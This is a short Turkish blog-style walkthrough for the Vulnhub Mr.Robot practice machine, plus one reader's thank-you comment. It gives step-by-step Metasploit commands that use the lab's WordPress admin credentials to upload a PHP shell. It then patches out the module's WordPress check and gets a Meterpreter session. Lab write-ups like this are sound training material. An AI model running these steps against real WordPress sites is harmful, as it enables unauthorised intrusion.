Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/mr-robot-1,151/
Mr.Robot zafiyetli sanal makineye ait WordPress yönetim arayüzünde açılan oturum aşağıdaki gibidir.
WordPress yönetim arayüzü üzerinde yönetici yetkilerine sahipken hedef sisteme PHP kodu yüklemeyebilmek için MSF wp_admin_shell_upload istismar modülü kullanılabilir.
search wp_admin_shell_upload
Bulunan MSF modülü seçilir ve seçenekleri incelenir.
use exploit/unix/webapp/wp_admin_shell_upload
show options
Seçenekleri ayarlanır.
set RHOST 192.168.2.58
set USERNAME elliot
set PASSWORD ER28-0652
Modül başlatılır.
run
Ancak WordPress kurulu olmadığına dair bir hata mesajı alınmaktadır.
The target does not appear to be using WordPress
Hatanın ayrıntısı incelendiğinde – değişken adlarına göre – WordPress’in kurulu olmadığından değil, çevrim içi olarak çalışmadığı için hata alındığı görülmektedir.
locate wp_admin_shell_upload
grep -n “The target does not appear to be using WordPress” /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
Bu kontrol yorum satırı olarak değiştirildiğinde sonraki komutların çalışması beklenmektedir.
Modüller yeniden yüklendiğinde ve ilgili modül çalıştırıldığında Meterpreter bağlantısının elde edildiği görülür.
reload
run
Elde edilen erişimin (3056 ID’li proses) WordPress uygulaması üzerinden sağlandığı görülebilir.
getuid
getpid
shell
ps -ef | grep 3056
Kaynak:
Elinize sağlık, güzel içerik olmuş. Daha fazla yazı bekliyoruz. Türkçe kaynağa ihtiyacımız var =)